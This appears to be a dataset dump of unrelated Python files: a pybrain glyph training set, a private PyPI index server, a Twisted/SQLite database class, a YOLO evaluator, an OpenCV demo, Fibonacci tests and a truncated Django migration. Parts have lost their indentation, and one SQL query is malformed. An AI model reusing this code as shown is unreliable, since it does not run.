8,120 | a2569ccd509fa755f4cad026f483bcf891c6fb41 | from pybrain3.datasets import SupervisedDataSet
# 35 inputs = one 5x7 pixel bitmap per letter (1 = ink, -1 = blank);
# 20 outputs = a one-hot class target, in the glyph order listed below.
inputDataSet = SupervisedDataSet(35, 20)  # Creating new DataSet

# ASCII art for every training glyph: '#' maps to 1, '.' maps to -1.
_GLYPHS = [
    ('A', (".###.", "#...#", "#...#", "#####", "#...#", "#...#", "#...#")),
    ('B', ("####.", "#...#", "#...#", "####.", "#...#", "#...#", "####.")),
    ('C', (".###.", "#...#", "#....", "#....", "#....", "#...#", ".###.")),
    ('D', ("####.", "#...#", "#...#", "#...#", "#...#", "#...#", "####.")),
    ('F', ("#####", "#....", "#....", "####.", "#....", "#....", "#....")),
    ('G', (".###.", "#...#", "#....", "#.###", "#...#", "#...#", ".###.")),
    ('H', ("#...#", "#...#", "#...#", "#####", "#...#", "#...#", "#...#")),
    ('I', ("..#..",) * 7),
    ('K', ("#...#", "#..#.", "#.#..", "##...", "#.#..", "#..#.", "#...#")),
    ('U', ("#...#",) * 6 + (".###.",)),
    ('M', ("#...#", "##.##", "#.#.#", "#...#", "#...#", "#...#", "#...#")),
    ('E', ("####.", "#....", "#....", "###..", "#....", "#....", "####.")),
    ('L', ("#....",) * 6 + ("####.",)),
    ('O', ("#####", "#...#", "#...#", "#...#", "#...#", "#...#", "#####")),
    ('P', ("###..", "#..#.", "#..#.", "###..", "#....", "#....", "#....")),
    ('R', ("###..", "#..#.", "#..#.", "###..", "#.#..", "#..#.", "#...#")),
    ('T', ("#####", "..#..", "..#..", "..#..", "..#..", "..#..", "..#..")),
    ('W', ("#...#", "#...#", "#...#", "#...#", "#.#.#", "##.##", "#...#")),
    ('X', (".....", ".....", "#...#", ".#.#.", "..#..", ".#.#.", "#...#")),
    ('Y', (".....", ".....", "#...#", ".#.#.", "..#..", ".#...", "#....")),
]

# Add each glyph as one sample: flatten the bitmap row-major into 35
# values and build the matching one-hot target for its class index.
for class_index, (_letter, art) in enumerate(_GLYPHS):
    pixels = tuple(1 if ch == '#' else -1 for row in art for ch in row)
    target = tuple(1 if col == class_index else 0 for col in range(20))
    inputDataSet.addSample(pixels, target)
8,121 | bd25b97de78f04510e43f13d356eb6c0025e223d | #!/usr/bin/python
"""
An extensible private pypi index.
NOTES ON PACKAGE NAMES
----------------------
MPyPi tries the following when it does not find a package
with the given name in the index:
- replaces all _ with - and
- lowercases the package name
"""
from __future__ import print_function
from __future__ import unicode_literals
import cgi
import re
from .util import PY2, PY3
if PY2:
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
else:
from http.server import BaseHTTPRequestHandler, HTTPServer
# --- format strings
# One anchor per entry (a package on the root page, a file on a package page).
ENTRY_FMT = """<a href="{url}">{name}</a><br/>\n"""
# Opening boilerplate for the root "simple" index page.
PAGE_FMT = """<html><head><title>Simple MPyPi Index</title><meta name="api-version" value="2" /></head><body>\n"""
# Opening boilerplate for a single package's links page.
PKG_PAGE_FMT = """<!DOCTYPE html><html><head><title>Links for {name}</title></head><body><h1>Links for {name}</h1>\n"""
# ------------------------------------------------------------------------------
# Snippet from pip._vendor.packaging.core
# ------------------------------------------------------------------------------
# PEP 503: any run of '-', '_' or '.' is treated as a single separator.
_canonicalize_regex = re.compile(r"[-_.]+")
def canonicalize_name(name):
    """Normalise *name* per PEP 503: fold separators to '-', lowercase."""
    collapsed = _canonicalize_regex.sub("-", name)
    return collapsed.lower()
# ------------------------------------------------------------------------------
# ------------------------------------------------------------------------------
# INTERNALLY USED FUNCTIONS
# ------------------------------------------------------------------------------
# --- page formatting functions
def page_index(packages):
    """Yield the HTML chunks of the root index page.

    Each package is linked via its PEP 503 canonical name (what pip's
    lowercased lookups resolve) while the visible label keeps the
    original package name.
    """
    yield PAGE_FMT
    for pkg in packages:
        # The old body bound unused locals (``url = name``) that were then
        # shadowed by the keyword arguments below; emit the entry directly.
        yield ENTRY_FMT.format(url=canonicalize_name(pkg.name), name=pkg.name)
def page_package(package):
    """Yield the HTML chunks of one package's download-links page."""
    yield PKG_PAGE_FMT.format(name=package.name)
    for link_name, link_url in package.links:
        yield ENTRY_FMT.format(name=link_name, url=link_url)
def msg_404(pkg_name):
    """Return a small HTML body for a missing package, with the name escaped."""
    # cgi.escape was deprecated in 3.2 and removed in Python 3.8, so the old
    # call crashes on modern interpreters; fall back to it only on Python 2.
    try:
        from html import escape
    except ImportError:  # Python 2
        from cgi import escape
    return '<html><body> Package <b>{}</b> does not exist.</body></html>\n'.format(escape(pkg_name))
def make_request_handler(index):
    """
    Build a BaseHTTPRequestHandler subclass closed over *index*.

    Arguments
    ---------
    index: dict-like
        - allows key lookups
        - has a values() function that returns a list of
          package instances.
        - supports get
    """
    # Both the empty path and "/" serve the root index page.
    root_paths = {'', '/'}
    class PyPiRequestHandler(BaseHTTPRequestHandler):
        def get_package(self, package_name):
            # None when the package is not in the index.
            package = index.get(package_name)
            return package
        def write_unicode(self, text):
            # wfile expects bytes; encode explicitly for PY2/PY3 parity.
            self.wfile.write(bytearray(text, encoding='utf-8'))
        def do_GET(self):
            print("GET", self.path)
            if self.path in root_paths:
                self.send_response(200)
                self.send_header('Content-type', 'text/html')
                self.end_headers()
                # serve index page
                for line in page_index(index.values()):
                    self.write_unicode(line)
            else:
                # follow pip standard of using lowercase names
                package_name = self.path.strip('/')
                package = self.get_package(package_name)
                if not package:
                    self.send_response(404)
                    self.send_header('Content-type', 'text/html')
                    self.end_headers()
                    self.write_unicode(msg_404(package_name))
                    return
                # serve package page
                self.send_response(200)
                self.send_header('Content-type', 'text/html')
                self.end_headers()
                for line in page_package(package):
                    self.write_unicode(line)
    return PyPiRequestHandler
def main(packages, index=None, host='', port=7890):
    """Serve a simple PyPI index for *packages* until interrupted.

    If *index* is not supplied, one is built keyed by each package's
    PEP 503 canonical name.  Blocks in serve_forever(); the listening
    socket is always closed on the way out.
    """
    # optionally create an index
    if index is None:
        index = {canonicalize_name(p.name): p for p in packages}
    # Construct the server outside the try block: previously an interrupt
    # raised before `server` was bound caused a NameError in the handler.
    server = HTTPServer((host, port), make_request_handler(index))
    print('Started mpypi on port {}'.format(port))
    try:
        server.serve_forever()
    except KeyboardInterrupt:
        print('^C received, shutting down the web server')
    finally:
        # server_close() releases the listening socket on every exit path,
        # not only on KeyboardInterrupt as before.
        server.server_close()
if __name__ == '__main__':
main([])
|
8,122 | 74f85732b4e1f4ef2b82a48818cbaedb18a56083 | from pydis.datastruct.sds import SdsImp
class RPCStub(object):
    """Stand-in RPC endpoint that just logs calls to stdout."""

    def __init__(self):
        pass

    def SET(self, key, value):
        """Pretend to store *key* -> *value* by printing the pair."""
        # Removed a stray no-op ``self`` expression statement that was here.
        print("{}: {}".format(key, value))
|
8,123 | 45c1510d19af0979326a1b9975ec363b0b80a291 | import pkg_resources
from twisted.enterprise import adbapi
from twisted.internet import defer
# Start a logger with a namespace for a particular subsystem of our application.
from twisted.logger import Logger
log = Logger("database")
class Database:
    def __init__(self, context, db_filename="database.sqlite"):
        """Open (creating/initialising if needed) the session's SQLite DB.

        context: dict-like with "session_files" (provides session_dir) and
        "reactor" (stopped on fatal DB errors).  All access goes through a
        twisted adbapi ConnectionPool; self._db_ready is a Deferred that
        fires with the pool once the schema exists.
        """
        # Get full path and filename for database
        session_files = context["session_files"]
        db_filename = session_files.session_dir / db_filename
        # Note if database already exists
        database_exists = db_filename.is_file()
        # Callback for every connection that is established to the
        # database
        def setup_connection(connection):
            # Turn on foreign key constraints
            cursor = connection.cursor()
            cursor.execute("PRAGMA foreign_keys = ON;")
            # # Turn on column names in rows
            # import sqlite3
            # connection.row_factory = sqlite3.Row
        # Open a connection to the database. SQLite will create the file if
        # it doesn't already exist.
        dbpool = adbapi.ConnectionPool(
            "sqlite3",
            db_filename,
            cp_openfun=setup_connection,
            check_same_thread=False  # See https://twistedmatrix.com/trac/ticket/3629
        )
        # If the database did not exist, initialise the database
        if not database_exists:
            print("Database requires initialisation")
            self._db_ready = dbpool.runInteraction(self._initialise_database)
            def on_success(data):
                log.info("Database successfully initialised")
                # Later callbacks receive the pool, not the script result.
                return dbpool
            def on_error(data):
                log.error(f"Failed to initialise the server's database: {data}")
                reactor = context["reactor"]
                reactor.stop()
            self._db_ready.addCallback(on_success)
            self._db_ready.addErrback(on_error)
        else:
            # Database exists already; hand over an already-fired Deferred.
            self._db_ready = defer.Deferred()
            self._db_ready.callback(dbpool)
        # Check that database is the correct version
        expected_version = 4
        def check_version(cursor):
            cursor.execute("SELECT version FROM Version")
            row = cursor.fetchone()
            if row is None:
                raise Exception("No version found in Version table of database")
            if row[0] == expected_version:
                log.info(f"Server database version {expected_version}")
                return dbpool
            else:
                # Version mismatch is fatal: stop the reactor and bail out.
                reactor = context["reactor"]
                reactor.stop()
                raise Exception(f"Database version ({row[0]}) did not match expected version ({expected_version}). Terminating.")
        def run_check_version(dbpool):
            return dbpool.runInteraction(check_version)
        d = self.get_dbpool()
        d.addCallback(run_check_version)
        def on_error(error):
            log.error("Failed to verify the database: "+str(error))
            reactor = context["reactor"]
            reactor.stop()
        d.addErrback(on_error)
# Initialise the database structure from instructions in file
def _initialise_database(self, cursor):
log.info("Initialising database")
initialisation_commands_filename = \
pkg_resources.resource_filename(
"singtserver",
"database.sql"
)
f = open(initialisation_commands_filename, "r")
initialisation_commands = f.read()
return cursor.executescript(initialisation_commands)
def get_dbpool(self):
d = defer.Deferred()
def db_ready(db):
d.callback(db)
return db
self._db_ready.addCallback(db_ready)
return d
def get_combination(self, track_id=None, take_ids=[]):
# Sanity check arguments
if (track_id is None
and len(take_ids) == 0):
raise Exception(
"Getting a combination from the database requires "+
"at least a Track ID or at least one Take ID"
)
# Get combination from database.
# See answers to https://stackoverflow.com/questions/63356820/sql-select-from-many-to-one
# and https://stackoverflow.com/a/5766293/562930
def get_combo(cursor):
if track_id is None:
assert len(take_ids) > 0
sql = (
"SELECT id\n"+
"FROM Combinations\n"+
"WHERE backingTrackId IS NULL\n"+
" AND id IN\n"+
" (SELECT combinationId\n"+
" FROM CombinationsDetail\n"+
" GROUP BY combinationId\n" +
" HAVING SUM(CASE WHEN takeId IN ({seq}) THEN 1 ELSE 0) = ?".format(
seq=",".join(["?"]*len(take_ids))
)
)
cursor.execute(
sql,
(*take_ids, len(take_ids))
)
elif len(take_ids) == 0:
sql = (
"SELECT id\n"+
"FROM Combinations\n"+
"WHERE backingTrackId = ?\n"+
" AND NOT EXISTS\n"+
" (SELECT * \n"+
" FROM CombinationsDetail\n"+
" WHERE combinationId = Combinations.id)"
)
cursor.execute(
sql,
(track_id, )
)
else:
sql = ("SELECT id\n"+
"FROM Combinations\n"+
"WHERE backingTrackId = ?\n"+
" AND id IN\n"+
" (SELECT combinationId\n"+
" FROM CombinationsDetail\n"+
" GROUP BY combinationId\n" +
" HAVING SUM(CASE WHEN takeId IN ({seq}) THEN 1 ELSE 0 END) = ?)").format(
seq=",".join(['?']*len(take_ids))
)
cursor.execute(
sql,
(track_id, *take_ids, len(take_ids))
)
# Although there should be at most only one combo id that
# matches the track and takes specification, even if there
# are more than one, we'll just return the first (or None
# if there aren't any).
row = cursor.fetchone()
if row is None:
return None
combo_id = row[0]
return combo_id
def when_ready(dbpool):
return dbpool.runInteraction(get_combo)
d = self.get_dbpool()
d.addCallback(when_ready)
def on_success(data):
log.info("Successfully added combination to database; combination id: "+str(data))
return data
d.addCallback(on_success)
def on_error(error):
log.error("Failed to add combination to the database: "+str(error))
raise Exception("Failed to add combination to the database")
d.addErrback(on_error)
return d
def add_combination(self, track_id=None, take_ids=[]):
"""Adds combination into database.
Returns combo_id.
"""
log.info(f"Adding combination to database with track id = {track_id} and take_ids = {take_ids}")
# Sanity check arguments
if (track_id is None
and len(take_ids) == 0):
raise Exception(
"Adding a combination to the database requires "+
"at least a Track ID or at least one Take ID"
)
# Create combination in database
def add_combo(cursor):
# Create audio id
cursor.execute("INSERT INTO AudioIdentifiers DEFAULT VALUES")
audio_id = cursor.lastrowid
print("track_id:", track_id)
cursor.execute(
"INSERT INTO Combinations (audioId, backingTrackId) VALUES (?, ?)",
(audio_id, track_id)
)
combo_id = cursor.lastrowid
for take_id in take_ids:
cursor.execute(
"INSERT INTO CombinationsDetail (combinationId, takeId) "+
"VALUES (?,?)",
(combo_id, take_id)
)
return combo_id
def when_ready(dbpool):
return dbpool.runInteraction(add_combo)
d = self.get_dbpool()
d.addCallback(when_ready)
def on_success(data):
log.info("Successfully added combination to database; combination id: "+str(data))
return data
def on_error(error):
log.error("Failed to add combination to the database: "+str(error))
raise Exception("Failed to add combination to the database")
d.addCallback(on_success)
d.addErrback(on_error)
return d
def get_track_audio_id(self, track_id):
"""Returns track's audio id or None."""
def execute_sql(cursor):
cursor.execute("SELECT audioId FROM BackingTracks WHERE id = ?",
(track_id,))
results = cursor.fetchone()
if results is None:
return None
else:
return results[0]
def when_ready(dbpool):
return dbpool.runInteraction(execute_sql)
d = self.get_dbpool()
d.addCallback(when_ready)
def on_error(error):
log.warn("Failed to get audio ID for track id ({track_id}): "+
str(error)
)
return error
d.addErrback(on_error)
return d
def get_take_audio_id(self, take_id):
"""Returns take's audio id or None."""
def execute_sql(cursor):
cursor.execute("SELECT audioId FROM Takes WHERE id = ?",
(take_id,))
results = cursor.fetchone()
if results is None:
return None
else:
return results[0]
def when_ready(dbpool):
return dbpool.runInteraction(execute_sql)
d = self.get_dbpool()
d.addCallback(when_ready)
def on_error(error):
log.warn("Failed to get audio ID for take id ({take_id}): "+
str(error)
)
return error
d.addErrback(on_error)
return d
def assign_participant(self, client_id, name):
"""Assigns the name to the client id."""
def execute_sql(cursor):
# First, check if the id already exists
cursor.execute(
"SELECT participantName FROM Participants WHERE id = ?",
(client_id,)
)
row = cursor.fetchone()
if row is None:
# We don't currently have this ID, insert it
cursor.execute(
"INSERT INTO Participants (id, participantName) "+
"VALUES (?, ?)",
(client_id, name)
)
return client_id
# Otherwise, a row does already exist
current_name = row[0]
if name == current_name:
# We have nothing to do, the database is already
# correct
return client_id
# Otherwise, we need to update the database
cursor.execute(
"UPDATE Participants SET participantName = ? WHERE id = ?",
(name, client_id)
)
return client_id
def when_ready(dbpool):
return dbpool.runInteraction(execute_sql)
d = self.get_dbpool()
d.addCallback(when_ready)
def on_error(error):
log.warn(
"Failed to add participant given name '{name}' and id '{client_id}': "+
str(error)
)
return error
d.addErrback(on_error)
return d
def get_participants(self):
def execute_sql(cursor):
cursor.execute("SELECT id, participantName FROM Participants")
rows = cursor.fetchall()
results = [{"id":id_, "name":name} for id_, name in rows]
return results
def when_ready(dbpool):
return dbpool.runInteraction(execute_sql)
d = self.get_dbpool()
d.addCallback(when_ready)
def on_error(error):
log.warn(
"Failed to get participant list: "+
str(error)
)
return error
d.addErrback(on_error)
return d
    def get_audio_ids_from_combination_id(self, combination_id):
        """Return a Deferred firing with the audio ids of a combination:
        the backing track's audio id (if any) followed by the takes'.
        """
        def execute_sql(cursor):
            # Get Track ID. There should be either zero or one, but
            # not more.
            # NOTE(review): with a LEFT JOIN, a combination whose
            # backingTrackId is NULL still yields one row (audioId NULL),
            # so the len==0 branch below may be unreachable and a [None]
            # entry possible — confirm against database.sql.
            cursor.execute(
                "SELECT BackingTracks.audioId\n"+
                "FROM Combinations\n"+
                "LEFT JOIN BackingTracks\n"+
                "ON Combinations.backingTrackId = BackingTracks.id\n"+
                "WHERE combinations.id = ?",
                (combination_id,)
            )
            rows = cursor.fetchall()
            if len(rows) == 0:
                # We don't have a backing track; that's fine, move on
                # to the takes.
                backing_audio_ids = []
            elif len(rows) == 1:
                # We have one backing track
                row = rows[0]
                audio_id = row[0]
                backing_audio_ids = [audio_id]
            else:
                # We have more than one backing track; error.
                raise Exception(
                    f"More than one backing track matched "+
                    f"combination id {combination_id}; this "+
                    f"shouldn't be possible"
                )
            # Get the Take IDs. There may be many of these. But if
            # there wasn't a backing track id, then there needs to be
            # at least one Take ID.
            # NOTE(review): the join condition pairs CombinationsDetail.id
            # with Takes.combinationId — it looks like it should be
            # CombinationsDetail.takeId = Takes.id; verify the schema
            # before relying on this query.
            cursor.execute(
                "SELECT audioId\n"+
                "FROM CombinationsDetail\n"+
                "LEFT JOIN Takes\n"+
                "ON CombinationsDetail.id = Takes.combinationId\n"+
                "WHERE CombinationsDetail.combinationId = ?",
                (combination_id,)
            )
            rows = cursor.fetchall()
            if len(rows) == 0:
                # This is only as issue if we don't have any backing
                # tracks either
                if len(backing_audio_ids) == 0:
                    raise Exception(
                        f"We have neither a backing track nor takes "+
                        f"for the given combination id ({combination_id});"+
                        f"this shouldn't be possible"
                    )
            else:
                # Add the Take IDs to the list
                takes_audio_ids = [row[0] for row in rows]
                backing_audio_ids += takes_audio_ids
            return backing_audio_ids
        def when_ready(dbpool):
            return dbpool.runInteraction(execute_sql)
        d = self.get_dbpool()
        d.addCallback(when_ready)
        def on_error(error):
            log.warn(
                "Failed to get backing audio ids from combination id: "+
                str(error)
            )
            return error
        d.addErrback(on_error)
        return d
def add_take(self, take_name, combination_id):
def execute_sql(cursor):
# Create audio id
cursor.execute("INSERT INTO AudioIdentifiers DEFAULT VALUES")
audio_id = cursor.lastrowid
# Create take
cursor.execute(
"INSERT INTO Takes (audioId, combinationId, takeName, complete) "+
"VALUES (?, ?, ?, 0)",
(audio_id, combination_id, take_name)
)
take_id = cursor.lastrowid
return take_id
def when_ready(dbpool):
return dbpool.runInteraction(execute_sql)
d = self.get_dbpool()
d.addCallback(when_ready)
def on_error(error):
log.warn(
"Failed to add take: "+
str(error)
)
return error
d.addErrback(on_error)
return d
def add_recording_audio_ids(self, take_id, participants):
def execute_sql(cursor):
audio_ids = {}
for participant_id in participants:
# Create audio id
cursor.execute("INSERT INTO AudioIdentifiers DEFAULT VALUES")
audio_id = cursor.lastrowid
# Add entry into Recordings
cursor.execute(
"INSERT INTO Recordings "+
"(audioId, participantId, takeId, complete) "+
"VALUES (?, ?, ?, 0)",
(audio_id, participant_id, take_id)
)
audio_ids[participant_id] = audio_id
return audio_ids
def when_ready(dbpool):
return dbpool.runInteraction(execute_sql)
d = self.get_dbpool()
d.addCallback(when_ready)
def on_error(error):
log.warn(
"Failed to add recordings for participants: "+
str(error)
)
return error
d.addErrback(on_error)
return d
|
8,124 | 3bb6305ceb1491db57c7f8b03e438398644c8f90 | from Eutils.pathmagic import context
with context():
import argparse
import numpy as np
from model.hourglass_yolo_net_multi_gpu import HOURGLASSYOLONet
from evaluator.Eutils.pascal_val import PASCAL_VAL
# from evaluator.Eutils.coco_val import COCO_VAL
from evaluator.Eutils.detector import Detector
import utils.config as cfg
from utils.logger import Logger
from utils.config_utils import get_config,ds_config
from tqdm import tqdm
import tensorflow as tf
import copy
import os
# import cv2
# from evaluator.Eutils.draw_result import draw_result
class EVALUATOR(object):
    """Runs a detector over a validation set and computes its PR curve / AP."""
    def __init__(self, detector, data):
        self.detector = detector
        self.data = data
        # Total number of ground-truth boxes (denominator of recall).
        self.gt = self.data.gt
        self.image_ids, self.bboxes, \
        self.prob, self.annotations = self.prepare()
        self.precision, self.recall = self.pr_curve()
    def prepare(self):
        """Run the detector over every batch and collect detections.

        Returns (image_ids, boxes, confidences, annotations), with all
        detections sorted by descending confidence for AP computation.
        """
        image_ids, bboxes, prob = [], [], []
        # Ground truth per image id, deep-copied so the 'det' matched
        # flags can be mutated later in pr_curve().
        annotations = {}
        # while img_batch:
        for i in tqdm(range(self.data.num_batch), desc='batch forward'):
            # print("{:5}th batch".format(i))
            img_batch, bbox_batch = self.data.get_batch()
            results = self.detector.detect_batch(img_batch)
            for ii in range(len(results)):
                boxes_filtered, probs_filtered = results[ii]
                # bbox_gt = bbox_batch[ii]['bbox_det']['bboxes']
                # filter_mat_probs = np.array(probs_filtered >= cfg.THRESHOLD, dtype='bool')
                # filter_mat_probs = np.nonzero(filter_mat_probs)
                # boxes_ft_prob = boxes_filtered[filter_mat_probs]
                # probs_ft_prob = probs_filtered[filter_mat_probs]
                # image = img_batch[ii]
                # draw_result(image, bbox_gt, (0, 0, 255))
                # draw_result(image, boxes_ft_prob, (255, 0, 0))
                # cv2.imshow('Image', image)
                # cv2.waitKey(0)
                # One image id per detection so detections stay paired
                # with their source image after the global sort below.
                image_ids.extend([bbox_batch[ii]['id']] * len(boxes_filtered))
                bboxes.extend(boxes_filtered)
                prob.extend(probs_filtered)
                if bbox_batch[ii]['id'] not in annotations:
                    annotations[bbox_batch[ii]['id']] = copy.deepcopy(bbox_batch[ii]['bbox_det'])
        # Sort every detection (across all images) by confidence, descending.
        sorted_ind = np.argsort(prob)[::-1]
        sorted_prob = np.sort(prob)[::-1]
        BB = np.array(bboxes)
        BB = BB[sorted_ind, :]
        image_ids = [image_ids[x] for x in sorted_ind]
        return image_ids, BB, sorted_prob, annotations
    def pr_curve(self):
        """Greedy-match detections to ground truth; return (precision, recall).

        Boxes are in centre format (cx, cy, w, h) — the half-extent
        arithmetic below converts them to corner coordinates for the IoU.
        """
        nd = len(self.image_ids)
        tp = np.zeros(nd)
        fp = np.zeros(nd)
        for d in tqdm(range(nd), desc='painting PR curve'):
            # for d in range(nd):
            R = self.annotations[self.image_ids[d]]
            bb = self.bboxes[d, :].astype(float)
            ovmax = -np.inf
            BBGT = R['bboxes'].astype(float)
            if BBGT.size > 0:
                # compute overlaps
                # intersection
                ixmin = np.maximum(BBGT[:, 0] - BBGT[:, 2] / 2, bb[0] - bb[2] / 2)
                iymin = np.maximum(BBGT[:, 1] - BBGT[:, 3] / 2, bb[1] - bb[3] / 2)
                ixmax = np.minimum(BBGT[:, 0] + BBGT[:, 2] / 2, bb[0] + bb[2] / 2)
                iymax = np.minimum(BBGT[:, 1] + BBGT[:, 3] / 2, bb[1] + bb[3] / 2)
                iw = np.maximum(ixmax - ixmin + 1., 0.)
                ih = np.maximum(iymax - iymin + 1., 0.)
                inters = iw * ih
                # union
                uni = bb[2] * bb[3] + BBGT[:, 2] * BBGT[:, 3] - inters
                overlaps = inters / uni
                ovmax = np.max(overlaps)
                jmax = np.argmax(overlaps)
            if ovmax > cfg.IOU_THRESHOLD_GT:
                if not R['det'][jmax]:
                    # First detection to match this GT box: true positive.
                    tp[d] = 1.
                    R['det'][jmax] = 1
                else:
                    # GT box already claimed: duplicate detection counts FP.
                    fp[d] = 1.
            else:
                fp[d] = 1.
            # compute precision recall
        fp = np.cumsum(fp)
        tp = np.cumsum(tp)
        rec = tp / float(self.gt)
        # avoid divide by zero in case the first detection matches a difficult
        # ground truth
        prec = tp / np.maximum(tp + fp, np.finfo(np.float64).eps)
        return prec, rec
    def eval(self, use_07_metric=False):
        """ ap = eval(rec, prec, [use_07_metric])
        Compute AP given precision and recall.
        If use_07_metric is true, uses the
        VOC 07 11 point method (default:False).
        """
        if use_07_metric:
            # 11 point metric
            ap = 0.
            for t in np.arange(0., 1.1, 0.1):
                if np.sum(self.recall >= t) == 0:
                    p = 0
                else:
                    p = np.max(self.precision[self.recall >= t])
                ap = ap + p / 11.
        else:
            # correct AP calculation
            # first append sentinel values at the end
            mrec = np.concatenate(([0.], self.recall, [1.]))
            mpre = np.concatenate(([0.], self.precision, [0.]))
            # compute the precision envelope
            for i in range(mpre.size - 1, 0, -1):
                mpre[i - 1] = np.maximum(mpre[i - 1], mpre[i])
            # to calculate area under PR curve, look for points
            # where X axis (recall) changes value
            i = np.where(mrec[1:] != mrec[:-1])[0]
            # and sum (\Delta recall) * prec
            ap = np.sum((mrec[i + 1] - mrec[i]) * mpre[i + 1])
        return ap
def main():
    """Evaluate one model (default) or sweep every checkpoint under a log dir.

    With --auto_all, walks ../<log_file>, sorts checkpoints by step number,
    and logs an AP per (data source, checkpoint) pair.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('-ims', '--image_size', default=512, type=int)
    parser.add_argument('-g','--gpu', type=str)
    parser.add_argument('-c', '--cpu', action='store_true', help='use cpu')
    parser.add_argument('-ds', '--data_source', default='all', type=str, choices=['coco', 'pascal', 'all'])
    parser.add_argument('-ef', '--eval_file', type=str, required=True)
    parser.add_argument('-lf', '--log_file', type=str)
    parser.add_argument('-al', '--auto_all', action='store_true')
    # when calculate single model
    parser.add_argument('--weights', default="hg_yolo-240000", type=str)
    parser.add_argument('--weight_dir', default='../log_bbox_hm/0.8_0.08_0.03_conv_fc_l2_0.005_bhm5', type=str)
    args = parser.parse_args()
    # Device selection via CUDA_VISIBLE_DEVICES; --cpu hides all GPUs.
    if args.gpu:
        os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu
    if args.cpu:
        os.environ['CUDA_VISIBLE_DEVICES'] = ''
    if not args.auto_all:
        # Single-checkpoint evaluation on PASCAL.
        strings = get_config(args.weight_dir)
        net = HOURGLASSYOLONet('eval')
        detector = Detector(net, os.path.join(args.weight_dir, args.weights))
        # data = COCO_VAL()
        data = PASCAL_VAL()
        evaluator = EVALUATOR(detector, data)
        ap = evaluator.eval()
        log = Logger(args.eval_file, level='debug')
        log.logger.info('\n calculate single ap from {} {}\n'.format(args.weight_dir, args.weights))
        log.logger.info('Data sc:{} AP:{} Weights:{} {}'.format(
            data.__class__.__name__, ap, args.weights, strings))
    else:
        data_source = ds_config(args)
        log = Logger(args.eval_file, level='debug')
        log.logger.info('\n calculate ap from {}\n'.format(args.eval_file))
        model_start = 'hg_yolo'
        rootdir = '../' + args.log_file
        root_list = os.listdir(rootdir)  # list every file and directory under the log root
        root_list.sort()
        for path in root_list:
            model_dir = os.path.join(rootdir, path)
            models = os.listdir(model_dir)
            # Keep checkpoint files only, strip extensions, dedupe, and
            # sort by training step (the digits after 'hg_yolo-').
            models = filter(lambda x: x.startswith(model_start), models)
            models = list(set(map(lambda x: x.split('.')[0], models)))
            models.sort(key=lambda x: int(x[8:]))
            for data in data_source:
                for model in models:
                    strings = get_config(model_dir)
                    # Fresh graph per checkpoint to avoid variable clashes.
                    tf.reset_default_graph()
                    net = HOURGLASSYOLONet('eval')
                    detector = Detector(net, os.path.join(model_dir, model))
                    evaluator = EVALUATOR(detector, data)
                    ap = evaluator.eval()
                    log.logger.info('Data sc:{} AP:{:<5.5f} Weights:{} {}'.format(
                        data.__class__.__name__, ap, model, strings))
                    detector.sess.close()
                    del net
                    del detector
                    del evaluator
if __name__ == '__main__':
main()
# print(os.path.realpath('.'))
# print(os.path.dirname(os.path.realpath('.')))
# print(os.sep)
#
# print(os.path.dirname(os.path.realpath('.')).split(os.sep))
|
8,125 | f6c5c2180a1a4b05b3f103c330b455e7387713a6 | #!/usr/bin/env python
import numpy as np
import cv2
# Create a 512x512 image with 3 channels (BGR), initially all black.
image = np.zeros((512, 512, 3), np.uint8)
# Point convention reminder: coordinates are (x, y) with the origin at the
# top-left corner, x growing right and y growing down:
#   x0y0, x1y0, x2y0
#   x0y1, x1y1, x2y1
# Draw two horizontal white lines across the top of the image.
# Arguments: start point, end point, BGR colour, line width.
cv2.line(image, (0, 0), (512, 0), (255, 255, 255), 5)
cv2.line(image, (0, 50), (512, 50), (255, 255, 255), 5)
# Draw a green rectangle outline (top-left, bottom-right, colour, thickness).
cv2.rectangle(image, (256, 0), (400, 256), (0, 255, 0), 3)
font = cv2.FONT_HERSHEY_COMPLEX
# Blue anti-aliased caption near the bottom-left.
cv2.putText(image, "ROS OpenCV", (10, 500),
            font, 2, (255, 0, 0), 2, cv2.LINE_AA)
# Show the result and wait for any key before closing the window.
cv2.imshow("Draw Image", image)
cv2.waitKey(0)
cv2.destroyAllWindows()
|
8,126 | 49722f640eec02029865fd702e13e485eda6391b | import math_series.series as func
""" Testing for fibonacci function """
def test_fibonacci_zero():
    """fibonacci(0) is the base case 0."""
    assert func.fibonacci(0) == 0
def test_fibonacci_one():
    """fibonacci(1) is the base case 1."""
    assert func.fibonacci(1) == 1
def test_fibonacci_negative():
    """Negative input yields the error string, not a value."""
    assert func.fibonacci(-5) == "Negative values are not allowable"
def test_fibonacci_else():
    """General case: the 6th Fibonacci number is 8."""
    assert func.fibonacci(6) == 8
""" Testing for lucas function """
def test_lucas_zero():
    """lucas(0) is the base case 2."""
    assert func.lucas(0) == 2
def test_lucas_one():
    """lucas(1) is the base case 1."""
    assert func.lucas(1) == 1
def test_lucas_negative():
    """Negative input yields the error string, not a value."""
    assert func.lucas(-5) == "Negative values are not allowable"
def test_lucas_else():
    """General case: the 6th Lucas number is 18."""
    assert func.lucas(6) == 18
""" Testing for non_fibonacci_lucas function """
def test_non_fibonacci_lucas_zero():
    """Index 0 returns the first seed value."""
    assert func.non_fibonacci_lucas(0, 2, 4) == 2
def test_non_fibonacci_lucas_one():
    """Index 1 returns the second seed value."""
    assert func.non_fibonacci_lucas(1, 2, 4) == 4
def test_non_fibonacci_lucas_negative():
    """Negative index yields the error string, not a value."""
    assert func.non_fibonacci_lucas(-5, 2, 4) == "Negative values are not allowable"
def test_non_fibonacci_lucas_else():
    """General case with seeds (2, 4): term 3 is 10."""
    assert func.non_fibonacci_lucas(3, 2, 4) == 10
8,127 | d13589979ba7b6facd8339111323270c9920a9bf | # Generated by Django 2.0.4 on 2018-04-30 14:01
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated: creates the Post model.

    Post inherits from base.Base via multi-table inheritance (the
    base_ptr one-to-one link) and references the configured user model.
    """
    # First migration for this app.
    initial = True
    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('base', '0007_topfilter'),
    ]
    operations = [
        migrations.CreateModel(
            name='Post',
            fields=[
                ('base_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='base.Base')),
                ('title', models.CharField(max_length=50)),
                ('text', models.TextField()),
